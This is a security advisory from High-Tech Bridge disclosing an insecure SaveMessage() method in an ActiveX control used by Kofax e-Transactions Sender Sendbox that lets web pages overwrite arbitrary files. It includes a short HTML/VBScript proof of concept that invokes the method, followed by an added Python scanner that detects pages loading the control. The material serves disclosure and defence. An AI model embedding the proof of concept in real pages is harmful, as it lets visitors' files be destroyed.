HTB23016: Kofax e-Transactions Sender Sendbox ActiveX Control Insecure Method Jun 22 2011 01:34PM
advisory htbridge ch
Vulnerability ID: HTB23016
Reference: http://www.htbridge.ch/advisory/kofax_e_transactions_sender_sendbox_acti
Product: Kofax e-Transactions Sender Sendbox
Vendor: Kofax, Inc ( http://www.kofax.com/ )
Vulnerable Version: and probably prior
Tested on:
Vendor Notification: 01 June 2011
Vulnerability Type: ActiveX Control Insecure Method
Risk level: Medium
Credit: High-Tech Bridge SA Security Research Lab ( http://www.htbridge.ch/advisory/ )

Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered a vulnerability in Kofax e-Transactions Sender Sendbox, which can be exploited to overwrite arbitrary files.

The vulnerability is caused by the LEADeMail.LEADSmtp.20 (LTCML14n.dll) ActiveX control exposing the insecure "SaveMessage()" method. This can be exploited to overwrite arbitrary files with junk data in the context of the currently logged-on user.

The following PoC code is available:

<object classid='clsid:0014085F-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target'></object>
<input language=VBScript onclick=Boom() type=button value="Exploit">
<script language='vbscript'>

Sub Boom()
target.SaveMessage arg1 ,arg2
End Sub
</script>
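
A defender-side check for the pattern in the PoC, as an added example that is not part of the original advisory: it scans HTML for pages that load this control (by the CLSID from the PoC, or by the ProgID named in the details) and reports which bound names call SaveMessage. The ProgID instantiation forms it matches and the sample inputs are assumptions constructed for illustration.

```python
import re

# Identifiers taken from the advisory text and PoC.
CLSID = "0014085F-B1BA-11CE-ABC6-F5B2E79D9E3F"
PROGID = "LEADeMail.LEADSmtp"  # the ".20" version suffix is matched optionally
METHOD = "SaveMessage"

OBJECT_TAG = re.compile(r"<object\b[^>]*>", re.I)
CLASSID_ATTR = re.compile(
    r"classid\s*=\s*['\"]?\s*clsid:\{?" + re.escape(CLSID) + r"\}?", re.I)
ID_ATTR = re.compile(r"\bid\s*=\s*['\"]?(\w+)", re.I)
# Assumption: a page may also load the control by ProgID from script.
BY_PROGID = re.compile(
    r"(\w+)\s*=\s*(?:new\s+ActiveXObject|CreateObject)\s*\(\s*['\"]"
    + re.escape(PROGID) + r"(?:\.\d+)?['\"]", re.I)


def scan(html):
    """Return names bound to the control and the subset that call SaveMessage."""
    names = []
    for tag in OBJECT_TAG.findall(html):
        if CLASSID_ATTR.search(tag):
            m = ID_ATTR.search(tag)
            names.append(m.group(1) if m else "")  # "" = object tag without id
    names += BY_PROGID.findall(html)
    # VBScript and COM dispatch names are case-insensitive, hence re.I.
    calls = [n for n in names if n and re.search(
        r"\b" + re.escape(n) + r"\s*\.\s*" + METHOD + r"\b", html, re.I)]
    return {"instances": names, "calls": calls}


# Constructed sample inputs (not captured traffic).
POC_LIKE = """<object classid='clsid:0014085F-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target'></object>
<script language='vbscript'>
Sub Boom()
target.SaveMessage arg1 ,arg2
End Sub
</script>"""
LOAD_ONLY = '<script language="vbscript">Set m = CreateObject("LEADeMail.LEADSmtp.20")</script>'
OTHER_CONTROL = """<object classid="clsid:11111111-2222-3333-4444-555555555555" id="target"></object>
<script>target.SaveMessage(a, b);</script>"""

if __name__ == "__main__":
    for label, doc in [("poc-like", POC_LIKE), ("load-only", LOAD_ONLY),
                       ("other-control", OTHER_CONTROL)]:
        print(label, scan(doc))
```
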

